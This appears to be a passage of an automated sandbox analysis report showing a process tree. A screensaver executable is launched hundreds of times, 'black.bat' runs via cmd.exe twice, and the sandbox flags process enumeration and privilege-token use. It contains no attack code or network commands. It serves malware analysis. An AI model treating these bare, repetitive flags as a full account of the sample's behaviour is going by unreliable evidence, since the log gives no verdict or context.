C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
